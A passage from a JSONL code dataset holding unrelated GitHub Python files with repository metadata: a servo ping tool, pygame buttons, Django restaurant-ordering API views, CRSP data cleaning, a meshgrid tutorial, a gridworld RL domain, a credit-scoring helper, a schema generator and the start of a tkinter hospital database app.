range(retry):\n\t\tans = s.read()\n\n\t\tif ans:\n\t\t\tfor pkt in ans:\n\t\t\t\tservo = packetToDict(pkt)\n\t\t\t\tutils.prettyPrintPacket(servo)\n\t\t\t\tprint('raw pkt: {}'.format(pkt))\n\t\telse:\n\t\t\tprint('Try {}: no servos found'.format(cnt))\n\n\t\ttime.sleep(0.1)\n\n\ts.close()\n\n\nDESCRIPTION = \"\"\"\nSends out a ping packet and prints all of the returned packets. If you don't\nspecify a specific id number, the program defaults to 'all'.\n\nExample:\n\n./servo_ping.py /dev/tty.usbserial-AL034G2K\nFinding all servos:\nOpened /dev/tty.usbserial-AL034G2K @ 1000000\n---------------------------------------\nid........................... 1\nFirmware Ver................. 29\nModel Number................. 350\nError........................ None\nraw pkt: [255, 255, 253, 0, 1, 7, 0, 85, 0, 94, 1, 29, 31, 71]\n---------------------------------------\nid........................... 2\nFirmware Ver................. 29\nModel Number................. 350\nError........................ None\nraw pkt: [255, 255, 253, 0, 2, 7, 0, 85, 0, 94, 1, 29, 21, 119]\n\"\"\"\n\n\ndef handleArgs():\n\tparser = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter)\n\t# parser.add_argument('-m', '--max', help='max id', type=int, default=253)\n\tparser.add_argument('-r', '--rate', help='servo baud rate', type=int, default=1000000)\n\tparser.add_argument('-i', '--id', help='ping servo ID', type=int, default=-1)\n\tparser.add_argument('port', help='serial port name, set to \"dummy\" for testing', type=str)\n\n\targs = vars(parser.parse_args())\n\treturn args\n\n\nif __name__ == '__main__':\n\targs = handleArgs()\n\tprint('Finding all servos:')\n\tsweep(port=args['port'], rate=args['rate'], ID=args['id'])\n","repo_name":"MultipedRobotics/pyxl320","sub_path":"bin/servo_ping.py","file_name":"servo_ping.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"14490872404","text":"import pygame as pg\nfrom game_data import button_images, audio_paths\n\nclass Button(pg.sprite.Sprite):\n\tdef __init__(self, name, size):\n\t\tsuper().__init__()\n\t\tnormal_image = pg.image.load(button_images[name][0]).convert_alpha()\n\t\thovered_image = pg.image.load(button_images[name][1]).convert_alpha()\n\n\t\tself.hovered_image = pg.transform.scale(hovered_image, size)\n\t\tself.normal_image = pg.transform.scale(normal_image, size)\n\n\t\tself.image_rect = self.normal_image.get_rect()\n\n\t\tself.image = pg.Surface(self.image_rect.size, flags=pg.SRCALPHA)\n\t\tself.image.set_colorkey('white')\n\t\tself.rect = self.image.get_rect()\n\n\t\tself.hovered = False\n\t\tself.pressed = False\n\n\t\tself.click = pg.mixer.Sound(audio_paths['button'])\n\t\tself.click.set_volume(0.5)\n\n\tdef check_hover(self, mouse_pos):\n\t\tif (self.rect.left <= mouse_pos[0] <= self.rect.right) and (self.rect.top <= mouse_pos[1] <= self.rect.bottom):\n\t\t\tself.hovered = True\n\t\t\tself.image.blit(self.hovered_image, (0, 0))\n\t\telse:\n\t\t\tself.hovered = False\n\t\t\tself.image.blit(self.normal_image, (0, 0))\n\n\tdef update(self, mouse_down, mouse_position, sounds_on):\n\t\tself.check_hover(mouse_position)\n\t\tif self.hovered and mouse_down:\n\t\t\tself.pressed = True\n\t\telse:\n\t\t\tself.pressed = False\n\n\nclass AudioButton(Button):\n\tdef __init__(self, name, size, is_audio_on):\n\t\tsuper().__init__(name, size)\n\t\tname = name.replace('on', 'off')\n\t\tself.image_off = pg.transform.scale(pg.image.load(button_images[name][0]).convert_alpha(), size)\n\t\tself.image_off_hovered = pg.transform.scale(pg.image.load(button_images[name][1]).convert_alpha(), size)\n\t\tself.audio_on = True\n\n\t\tif not is_audio_on:\n\t\t\tself.toggle_audio(False)\n\n\tdef toggle_audio(self, sounds_on):\n\t\tif sounds_on:\n\t\t\tself.click.play()\n\t\tself.audio_on = not self.audio_on\n\t\tself.image_off, self.normal_image = self.normal_image, self.image_off\n\t\tself.image_off_hovered, self.hovered_image = self.hovered_image, self.image_off_hovered\n\n\nclass ButtonGroup(pg.sprite.Group):\n\tdef __init__(self, buttons, display_size):\n\t\tself.WIDTH = display_size[0]\n\t\tself.HEIGHT = display_size[1]\n\t\tsuper().__init__(buttons)\n\t\tself.place_buttons()\n\n\tdef place_buttons(self):\n\t\ty = self.HEIGHT * 3 / 4\n\t\tcurrent_x = self.WIDTH / (len(self.buttons) + 1)\n\t\tfor button in self.buttons:\n\t\t\tbutton.rect.center = (current_x, y)\n\t\t\tcurrent_x += self.WIDTH / (len(self.buttons) + 1)\n\n\nclass MenuButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size):\n\t\t# start button\n\t\tself.start_btn = Button('start', (180, 180))\n\t\t# quit button\n\t\tself.quit_btn = Button('quit', (180, 180))\n\t\t# settings button\n\t\tself.settings_btn = Button('settings', (180, 180))\n\t\tself.buttons = [self.start_btn, self.settings_btn, self.quit_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n\n\nclass PauseButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size):\n\t\t# start button\n\t\tself.start_btn = Button('start', (180, 180))\n\t\t# quit button\n\t\tself.quit_btn = Button('quit', (180, 180))\n\t\t# restart button\n\t\tself.restart_btn = Button('restart', (180, 180))\n\t\t# settings button\n\t\tself.settings_btn = Button('settings', (180, 180))\n\t\tself.buttons = [self.start_btn, self.restart_btn, self.settings_btn, self.quit_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n\n\nclass GameoverButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size):\n\t\t# quit button\n\t\tself.quit_btn = Button('quit', (180, 180))\n\t\t# restart button\n\t\tself.restart_btn = Button('restart', (180, 180))\n\t\t# settings button\n\t\tself.settings_btn = Button('settings', (180, 180))\n\t\tself.buttons = [self.restart_btn, self.settings_btn, self.quit_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n\n\nclass SettingsButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size, music_on, sounds_on):\n\t\t# go back button\n\t\tself.back_btn = Button('back', (180, 180))\n\t\t# music management button\n\t\tself.music_btn = AudioButton('music_on', (180, 180), music_on)\n\t\t# sound management button\n\t\tself.sound_btn = AudioButton('sound_on', (180, 180), sounds_on)\n\t\tself.buttons = [self.back_btn, self.music_btn, self.sound_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n","repo_name":"aronLev2065/midieval-apocalypse-game","sub_path":"data/code/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24273582142","text":"from web.models import *\nfrom django.http import JsonResponse\nfrom restapi.serializers import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom rest_framework.response import Response\nimport datetime\n\n\nCONTENT_NOT_FOUND = {'Message': 'Content Not Found'}\n\n\n# Providing a beacon id, return avalibale menus for this resturant.\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef menu_list2(request):\n if request.method == 'POST':\n beacon_id = request.data['beacon']\n menus = Menu.objects.filter(Res_id_id=Beacon.objects.get(Beacon_id=beacon_id).Res_id)\n now = datetime.datetime.now().hour\n # find the avaliable menus upon the current time\n if now < 11: # morning time\n ava_menus = menus.exclude(Type='DN').exclude(Type='LN')\n elif now < 16: # lunch time\n ava_menus = menus.exclude(Type='DN').exclude(Type='BK')\n else: # dinner time\n ava_menus = menus.exclude(Type='LN').exclude(Type='BK')\n\n if menus:\n ser = MenuSerializer(ava_menus, many=True)\n return Response(ser.data, status=status.HTTP_200_OK)\n return JsonResponse(CONTENT_NOT_FOUND, safe=False,status=status.HTTP_404_NOT_FOUND)\n\n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Record the payment info providing an order id\n@api_view(['POST'])\n@csrf_exempt\ndef pay(request):\n if request.method == 'POST':\n # prevent the user double pay an order\n if Payment.objects.filter(Order_id=request.data['Order_id']):\n return Response(\"You have paid the order already\", status=status.HTTP_200_OK)\n # post a payment entry in database\n ser = PaymentSerializer(data=request.data)\n if ser.is_valid():\n ser.save()\n return Response(ser.data, status=status.HTTP_200_OK)\n # the client did not post the valid data\n return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Place an item in the order when a customer adds an item in the shopping cart\n@api_view(['POST'])\n@csrf_exempt\ndef order_item(request):\n if request.method == 'POST':\n serializer = OrderItemSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Create a new order\n@api_view(['POST'])\n@csrf_exempt\ndef new_order(request):\n if request.method == 'POST':\n serializer = OrderSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Given the resturant id, get the information of this resturant.\ndef get_res_info(request, str):\n if request.method == 'GET':\n info = Restaurant.objects.get(Res_id=str)\n\n if info:\n ser = ResSerializer(info)\n return JsonResponse(ser.data, safe=False)\n return JsonResponse(CONTENT_NOT_FOUND, safe=False, status=status.HTTP_404_NOT_FOUND)\n\n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Get the product info for a menu\ndef menu_item(request, str):\n if request.method == 'GET':\n items = Product.objects.filter(menu_item__Menu_id=str)\n\n if items:\n ser = MenuItemSerializer(items, many=True)\n return JsonResponse(ser.data, safe=False)\n return JsonResponse(CONTENT_NOT_FOUND, safe=False, status=status.HTTP_404_NOT_FOUND) \n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# test code\ndef menu_list(request, str):\n if request.method == 'GET':\n menus = Menu.objects.filter(Res_id_id=str)\n ser = MenuSerializer(menus, many=True)\n return JsonResponse(ser.data, safe=False)\n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n","repo_name":"wtt4477/BracoStore5_capstone","sub_path":"capstone/restapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33858985576","text":"\"\"\"\nDescription: Cleans the crsp database to only include entries with valid returns and\nso that every stock is uniquely identified by Permco-datadate.\n\n\nI rename some variables, and collapse share classes. In the combined share classes, I\nadd up the market cap of each share class to get to the total market cap of that\ncompany at that time. Returns are also computed as market cap weighted returns of the\nindividual share classes.\n\"\"\"\n\n# Custom functions for data cleaning\nfrom utils import *\nimport numpy as np\nfrom copy import copy\n\n# Proper data cleaning\n################ Import Data ################\nprint_message('Loading Data')\ncrsp_raw = pd.read_csv('../Data/crsp.txt', sep = '\\t', low_memory = False)#, nrows = 10000)\n\n# Filter down to only common shares\ncrsp_raw = crsp_raw.loc[(crsp_raw['SHRCD'] == 10) | (crsp_raw['SHRCD'] == 11)]\n\nprint('Data Size:')\nprint(crsp_raw.shape)\nprint(str(crsp_raw.shape[0] * crsp_raw.shape[1]) + ' observations')\n\n################ Setting Types ################\nprint_message('Setting Types')\ncrsp_datatypes = {'date_vars': ['date'],\n 'float_vars': ['BIDLO', 'ASKHI', 'PRC', 'RET', 'DLRET', 'BID', 'ASK', 'RETX', 'CFACPR', 'CFACSHR'],\n 'int_vars': ['PERMNO', 'PERMCO', 'HSICCD', 'CUSIP', 'SHROUT', 'VOL', 'EXCHCD']}\ncrsp = clean_data(copy(crsp_raw), crsp_datatypes)\n\n################ Setting Types ################\nprint_message('Renaming Variables')\ncrsp_names = {'RET': 'Return',\n 'SHROUT': 'Shares Outstanding on Trading Day',\n 'COMNAM': 'Company Name',\n 'EXCHCD': 'Exchange Code',\n 'TICKER': 'Ticker',\n 'date': 'datadate',\n 'PERMNO': 'Permno',\n 'PERMCO': 'Permco',\n 'PRC': 'Price with Flag',\n 'BID': 'Bid',\n 'ASK': 'Ask',\n 'VOL': 'Volume on Trading Day',\n 'SHRCLS': 'Share Class',\n 'CFACPR': 'Price Adjustment Factor',\n 'CFACSHR': 'Share Adjustment Factor'}\n\ncrsp = crsp.rename(index = str, columns = crsp_names)\ncrsp = crsp[list(crsp_names.values())]\n\n# Make a few fundamental variables\nprint_message('Create new features')\ncrsp['Imputed Price'] = (crsp['Price with Flag'] < 0)\ncrsp['Price on Trading Day'] = np.abs(crsp['Price with Flag'])\ncrsp['Price'] = crsp['Price on Trading Day'] / crsp['Price Adjustment Factor']\ncrsp['Shares Outstanding'] = crsp['Shares Outstanding on Trading Day'] * crsp['Share Adjustment Factor']\ncrsp['Volume'] = crsp['Volume on Trading Day'] * crsp['Share Adjustment Factor']\ncrsp['Market Cap (Billions, CRSP)'] = crsp['Shares Outstanding'] * crsp['Price'] / 1e6\ncrsp = crsp.drop(['Price on Trading Day', 'Shares Outstanding on Trading Day', 'Volume on Trading Day'], axis = 1)\n\n################\nprint_message('Aggregating share classes')\nAGG_VAR_TYPES = {'First': ['Company Name', 'Permno', 'Ticker', 'Price', 'Bid', 'Ask', 'Exchange Code'],\n 'Add': ['Market Cap (Billions, CRSP)'],\n 'Market Cap Weighted Sum': ['Return'],\n 'Price Weighted Sum': ['Volume']}\n\nALL_CRSP_VAR = [item for sublist in AGG_VAR_TYPES.values() for item in sublist]\n\ndef agg_share_classes(company_on_date):\n \"\"\"\n Given a dataframe grouped on Permco and datadate, aggregates up the key variables from the individual\n share classes. THe operation done on each variable is defined by the global dictionary AGG_\n\n :param company_on_date - a dataframe from a pandas groupby object with all the variables inside ALL_CRSP_VAR\n :return a dataframe with one row that has all the variables in ALL_CRSP_VAR, agrgregated across the share classes\n \"\"\"\n\n company_on_date.safe_drop(['_Group'], inplace = True) # Addition to make it work well with the parallel process\n\n # If only one share class\n if company_on_date.shape[1] <= 1:\n return company_on_date[ALL_CRSP_VAR]\n\n # Then for the remainign cases\n company_on_date['Market Cap (Billions, CRSP)'].fillna(0)\n company_on_date.sort_values(by = ['Market Cap (Billions, CRSP)'], ascending = False, inplace = True)\n new_frame = company_on_date.iloc[0, :][AGG_VAR_TYPES['First']]\n\n for v in AGG_VAR_TYPES['Add']:\n new_frame[v] = company_on_date[v].fillna(0).sum()\n\n for v in AGG_VAR_TYPES['Market Cap Weighted Sum']:\n valid = ~company_on_date[v].isnull()\n denominator = company_on_date.loc[valid, 'Market Cap (Billions, CRSP)'].sum()\n\n if denominator > 0:\n new_frame[v] = (company_on_date.loc[valid, v] * company_on_date.loc[\n valid, 'Market Cap (Billions, CRSP)']).sum() / denominator\n else:\n new_frame[v] = company_on_date[v][0]\n\n for v in AGG_VAR_TYPES['Price Weighted Sum']:\n valid = ~company_on_date[v].isnull()\n denominator = new_frame['Price']\n\n if denominator > 0:\n new_frame[v] = (company_on_date.loc[valid, v] * company_on_date.loc[\n valid, 'Price']).sum() / denominator\n else:\n new_frame[v] = company_on_date[v][0]\n\n return new_frame\n\n# First, pull every permco-date that isn't paired\ncrsp = crsp.set_index(['Permco', 'datadate'])\ncrsp_counts = check_unique(crsp, ['Permco', 'datadate'])\n\n# Then isolate the problem observations\ncrsp_merge = crsp_counts.join(crsp, how = 'outer')\nproblem_children = crsp_merge.loc[~pd.isnull(crsp_merge['Count']), ALL_CRSP_VAR]\n\nif problem_children.shape[0] > 0:\n good_children = crsp_merge.loc[pd.isnull(crsp_merge['Count']), ALL_CRSP_VAR]\n merged_problems = parallel_apply(problem_children, ['Permco', 'datadate'], agg_share_classes, 2, None)\n merged_problems = merged_problems[ALL_CRSP_VAR]\n\n # Combine the dataframes together again\n crsp_merge = pd.concat([good_children[ALL_CRSP_VAR], merged_problems])\n\nprint_message('Dropping Null Returns')\ncrsp_merge = crsp_merge.loc[~pd.isnull(crsp_merge['Return'])]\n\n#######\nprint_message('Verifying data integrity')\ncrsp_merge = crsp_merge.safe_index(['Permco', 'datadate'])\n\n# Check final assumptions on the data\n# 1. Permco + datadate uniquely identify each observation\n# 2. For each permco, there is a continuous stream of returns without interruption\n\n# Unique identification\nduplicated_values = check_unique(crsp_merge, ['Permco', 'datadate'])\nprint('Duplicated permco-date pairs')\nprint(duplicated_values)\nassert(duplicated_values.shape[0] == 0)\n\n# Continuity of returns\nvalid_returns = parallel_apply(crsp_merge, ['Permco'], continuous_index, 2, None)\ndiscontinuous_returns = valid_returns.loc[~valid_returns]\nprint('Companies without continuous returns')\nprint(discontinuous_returns)\nassert(discontinuous_returns.shape[0] == 0)\n\n################\nprint_message('Outputting Data')\ncrsp_merge.to_hdf('../Output/crsp.h5', 'crsp')\n\nwith open('../Logs/crsp.log', 'w') as f:\n f.write('Raw CRSP file has been written')\n","repo_name":"luluywang/compustat_crsp","sub_path":"Code/write_crsp.py","file_name":"write_crsp.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"20296293401","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#首先要有散点图\nplt.scatter(X[:,0],X[:,1],c=y,s=50,cmap=\"rainbow\")\nax = plt.gca() #获取当前的子图,如果不存在,则创建新的子图\n\n#获取平面上两条坐标轴的最大值和最小值\nxlim = ax.get_xlim()\nylim = ax.get_ylim()\n \n#在最大值和最小值之间形成30个规律的数据\naxisx = np.linspace(xlim[0],xlim[1],30)\naxisy = np.linspace(ylim[0],ylim[1],30)\n \naxisy,axisx = np.meshgrid(axisy,axisx)\n#我们将使用这里形成的二维数组作为我们contour函数中的X和Y\n#使用meshgrid函数将两个一维向量转换为特征矩阵\n#核心是将两个特征向量广播,以便获取y.shape * x.shape这么多个坐标点的横坐标和纵坐标\n \nxy = np.vstack([axisx.ravel(), axisy.ravel()]).T\n#其中ravel()是降维函数,vstack能够将多个结构一致的一维数组按行堆叠起来\n#xy就是已经形成的网格,它是遍布在整个画布上的密集的点\n \nplt.scatter(xy[:,0],xy[:,1],s=1,cmap=\"rainbow\")\n \n\n\n\n\n#理解函数meshgrid和vstack的作用\na = np.array([1,2,3])\nb = np.array([7,8])\n#两两组合,会得到多少个坐标?\n#答案是6个,分别是 (1,7),(2,7),(3,7),(1,8),(2,8),(3,8)\n \nv1,v2 = np.meshgrid(a,b)\n \nv1\n \nv2\n \nv = np.vstack([v1.ravel(), v2.ravel()]).T\n","repo_name":"0meou0/Machine-Learning","sub_path":"仓库/生成网格.py","file_name":"生成网格.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40924015024","text":"'''\r\nModified on Sep. 22, 2018\r\n\r\n@author: Michael Gimelfarb\r\n'''\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom domains.Domain import Domain\r\n\r\n# possible movement directions\r\nLEFT, UP, RIGHT, DOWN = 0, 1, 2, 3\r\n\r\n\r\nclass TourDeFlags(Domain):\r\n\r\n def __init__(self, maze, initial):\r\n super().__init__()\r\n self.initial = (initial[0], initial[1], 0)\r\n self.maze = maze\r\n self.height, self.width = maze.shape\r\n\r\n # count all the sub-goals and free cells\r\n self.goals = 0\r\n self.free_cells = set()\r\n for c in range(self.width):\r\n for r in range(self.height):\r\n if maze[r, c] > 0:\r\n self.goals = max(self.goals, maze[r, c])\r\n elif maze[r, c] == 0:\r\n self.free_cells.add((r, c))\r\n\r\n # max steps to the goal\r\n self.max_steps = max(200, self.goals * (self.width + self.height))\r\n\r\n def copy(self):\r\n return TourDeFlags(np.copy(self.maze), self.initial)\r\n\r\n def initial_state(self):\r\n return self.initial\r\n\r\n def valid_actions(self):\r\n return [LEFT, UP, RIGHT, DOWN]\r\n\r\n def check(self, row, col, action):\r\n if (row == 0 and action == UP) or \\\r\n (row == self.height - 1 and action == DOWN) or \\\r\n (col == 0 and action == LEFT) or \\\r\n (col == self.width - 1 and action == RIGHT):\r\n return False\r\n return True\r\n\r\n def act(self, state, action):\r\n\r\n # perform the movement\r\n row, col, collected = state\r\n if self.check(row, col, action):\r\n if action == LEFT:\r\n col -= 1\r\n elif action == UP:\r\n row -= 1\r\n elif action == RIGHT:\r\n col += 1\r\n elif action == DOWN:\r\n row += 1\r\n else:\r\n return (row, col, collected), -2.0, False\r\n\r\n # compute the new state, status and reward\r\n grid_x1y1 = self.maze[row, col]\r\n if grid_x1y1 > 0:\r\n if collected + 1 == grid_x1y1:\r\n if collected + 1 == self.goals:\r\n return (row, col, collected + 1), -1.0, True\r\n else:\r\n return (row, col, collected + 1), -1.0, False\r\n elif collected >= grid_x1y1:\r\n return (row, col, collected), -1.0, False\r\n else:\r\n return (row, col, collected), -2.0, False\r\n else:\r\n return (row, col, collected), -1.0, False\r\n\r\n def render(self, policy, encoder, time=0.02):\r\n act = self.act\r\n state = self.initial_state()\r\n done = False\r\n im = None\r\n grid = np.copy(self.maze).astype('float')\r\n for row in range(self.height):\r\n for col in range(self.width):\r\n if grid[row, col] == -1:\r\n grid[row, col] = 0.0\r\n elif grid[row, col] == 0:\r\n grid[row, col] = 1.0\r\n else:\r\n grid[row, col] = 0.5\r\n steps = 0\r\n while not done and steps < self.max_steps:\r\n state_enc = encoder(state)\r\n action = policy(state_enc)\r\n new_state, _, done = act(state, action)\r\n if state == new_state:\r\n break\r\n row, col, _ = state = new_state\r\n grid[row, col] = 0.25\r\n if not im:\r\n im = plt.imshow(grid, cmap='gray', vmin=0, vmax=1)\r\n else:\r\n im.set_data(grid)\r\n plt.draw()\r\n plt.pause(time)\r\n grid[row, col] = 1.0\r\n steps += 1\r\n\r\n def default_encoding(self, state):\r\n\r\n # encoding is [e(row), e(col), e(collected)]^T\r\n input_dim = self.width + self.height + (1 + self.goals)\r\n arr = np.zeros(input_dim)\r\n row, col, collected = state\r\n arr[row] = 1.0\r\n arr[self.height + col] = 1.0\r\n arr[self.height + self.width + collected] = 1.0\r\n arr = arr.reshape((1, -1))\r\n return arr\r\n","repo_name":"mike-gimelfarb/bayesian-reward-shaping","sub_path":"domains/TourDeFlags.py","file_name":"TourDeFlags.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"5"} +{"seq_id":"15224171788","text":"from string import Template\nfrom urllib.parse import urlencode\nfrom webplex.router import local_request\n\n\ndef render_string(string, **context):\n template = Template(string)\n return template.safe_substitute(**context)\n\n\ndef render_template(filepath, **context):\n with open(filepath, \"r\") as f:\n contents = f.read()\n return render_string(contents, **context)\n\n\ndef url(*segments, **vars):\n base_url = local_request().application_url\n path = '/'.join(str(s) for s in segments)\n if not path.startswith('/'):\n path = \"/\" + path\n if vars:\n path += \"?\" + urlencode(vars)\n return base_url + path\n","repo_name":"xstrengthofonex/webplex","sub_path":"webplex/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6263488580","text":"def leiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO: Digite um número inteiro válido.\\033[m')\n continue\n except KeyboardInterrupt:\n print('\\n\\033[31mERRO: O usuário interrompeu o programa.\\033[m')\n return 0\n else:\n return n\n\n\nnum = leiaInt('Digite um valor: ')\nprint(f'Você digitou o número {num}')\n\n\n\n\n","repo_name":"nunes-moyses/Projetos-Python","sub_path":"Projetos Python/pythonexercicios/des113.py","file_name":"des113.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72877864793","text":"import pickle, json\nimport pandas as pd, numpy as np\n\nloaded_model = pickle.load(open('../../Deep Learning Model/finalized_model.sav', 'rb'))\nloaded_mapper = pickle.load(open('../../Deep Learning Model/mapper.pkl', 'rb'))\n\ndef preProcess(a, mapper,parameter_cols):\n data=list(a.values())\n colz=list(a.keys())\n dfx=pd.DataFrame(data=[data], columns=colz)\n dfx\n\n XX1=mapper.transform(dfx)\n XX2=dfx[parameter_cols]\n XX = np.hstack((XX1,XX2))\n return XX\n\ndef calculate_score(applicant_data):\n parameter_cols=['sub_grade_num', 'short_emp', 'emp_length_num','dti', 'payment_inc_ratio', 'delinq_2yrs',\n 'delinq_2yrs_zero', 'inq_last_6mths', 'last_delinq_none', 'last_major_derog_none', 'open_acc',\n 'pub_rec', 'pub_rec_zero','revol_util']\n required_fields = ['dti', 'inq_last_6mths', 'open_acc', 'emp_length_num', 'revol_util', 'grade', 'payment_inc_ratio', 'purpose', 'delinq_2yrs_zero', 'pub_rec_zero', 'pub_rec', 'short_emp', 'home_ownership', 'sub_grade_num', 'last_major_derog_none', 'last_delinq_none', 'delinq_2yrs']\n a = {}\n for field in required_fields:\n a[field] = applicant_data[field]\n\n XX=preProcess(a, loaded_mapper,parameter_cols)\n\n score = loaded_model.predict_proba(XX)[:,1][0]\n\n score = score * 10\n score = round(10 - score,2)\n\n return score\n","repo_name":"piy0999/CreditSense","sub_path":"bank_node/API/ml_helper.py","file_name":"ml_helper.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"72942179352","text":"import json\n\narena_objects_schema_path = 'schemas/input/arena-obj3d.json'\nobj_schema_path = 'schemas/input/arena-schema-files.json'\noutput_folder = 'schemas/'\n\ndef main():\n with open(arena_objects_schema_path) as f:\n schema = json.load(f)\n\n with open(obj_schema_path) as f:\n obj_schema_file = json.load(f)\n\n definitions = schema['definitions']\n arena_objects = schema['definitions']['obj3d']['oneOf']\n\n component_definitions = {}\n for cobj_name in definitions:\n if (cobj_name == 'obj3d'): continue\n component = True\n for obj in arena_objects:\n obj_name = obj['$ref'][len('#/definitions/'):]\n if (obj_name == cobj_name):\n component = False\n break\n if (component):\n component_definitions[cobj_name] = definitions[cobj_name]\n\n base_obj = {\n 'definitions': component_definitions,\n 'title': '',\n 'description': '',\n 'properties': schema['properties'],\n 'required': schema['required']\n }\n\n obj_schemas = {}\n for obj in arena_objects:\n obj_name = obj['$ref'][len('#/definitions/'):]\n new_obj = base_obj\n new_obj['title'] = obj['title']\n new_obj['description'] = obj['description']\n new_obj['properties']['data'] = definitions[obj_name]\n new_obj['properties']['data']['title'] = f'{obj[\"title\"]} Data'\n new_obj_json = json.dumps(new_obj, indent=4)\n file = open(f'{output_folder}{obj_name}.json','w')\n file.write(new_obj_json)\n file.close()\n\n obj_schemas[obj_name]={\n 'file': f'schemas/{obj_name}.json',\n 'title': obj['title'],\n 'description': obj['description'],\n }\n\n obj_schemas.update(obj_schema_file)\n file = open(f'{output_folder}arena-schema-files.json','w')\n file.write(json.dumps(obj_schemas, indent=4))\n file.close()\n\n\"\"\"\n for key in definitions:\n print(key, '->', definitions[key])\n break\n\n file1 = open(\"myfile.txt\",\"w\")\n\"\"\"\n\nif __name__ == '__main__':\n main()\n","repo_name":"arenaxr/arena-schemas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13646212404","text":"from tkinter import *\r\nfrom tkinter import ttk\r\n\r\nimport sqlite3\r\nwith sqlite3.connect('project.db') as db:\r\n cursor=db.cursor()\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"Hospital Database\")\r\nphoto=PhotoImage(file = \"hopsital.png\")\r\nroot.iconphoto(False, photo)\r\nframe=Frame(root)\r\nframe.pack()\r\nbotFrame = Frame(root)\r\n\r\ndef deleteExtra(name):\r\n temp=\"\"\r\n for n in name:\r\n if not(n=='(' or n=='\\'' or n==',' or n==')'):\r\n temp+=n\r\n return temp\r\ndef tupleToArray(arr1, number):\r\n y=0\r\n for n in number: #changing the count from tuple to int to use when creating the new array\r\n if not(n=='(' or n==',' or n==')'):\r\n y=n\r\n newArr = [\"\"]*y\r\n j=0\r\n for i in arr1: #goes through array of tuples\r\n for n in i: #goes through each tuple\r\n if not(n=='(' or n==',' or n==')'):\r\n newArr[j]=n\r\n j+=1\r\n return newArr \r\ndef strToDate(date):\r\n if len(date)==7:\r\n iter=0\r\n newDate=\"\"\r\n for i in date:\r\n if (iter==1) or (iter==3):\r\n newDate+=\"/\"\r\n newDate+=i\r\n iter+=1\r\n return newDate\r\n elif len(date)==8:\r\n iter=0\r\n newDate=\"\"\r\n for i in date:\r\n if (iter==2) or (iter==4):\r\n newDate+=\"/\"\r\n newDate+=i \r\n iter+=1 \r\n return newDate\r\n\r\ndef getUserName(idnumber):\r\n cursor.execute(\"SELECT f_name FROM employee WHERE emp_id = ?\", idnumber)\r\n name=str(cursor.fetchone())\r\n db.commit()\r\n newName=deleteExtra(name)\r\n return newName\r\n\r\ndef getPatientInfo(idnumber):\r\n cursor.execute(\"SELECT patient_id FROM treat_plan WHERE emp_id = ?\", idnumber)\r\n arr=cursor.fetchall()\r\n db.commit()\r\n cursor.execute(\"SELECT COUNT(treat_id) FROM treat_plan WHERE emp_id = ?\", idnumber)\r\n x=cursor.fetchone()\r\n db.commit()\r\n \r\n newArr=tupleToArray(arr, x)\r\n \r\n #destroy the previous frame\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n #creates the treeview\r\n tree=ttk.Treeview(frame)\r\n tree['columns'] = (\"ID\", \"FN\", \"LN\", \"Ailment\")\r\n tree.column(\"#0\", width=1, minwidth=0)\r\n tree.column(\"ID\", anchor=CENTER, 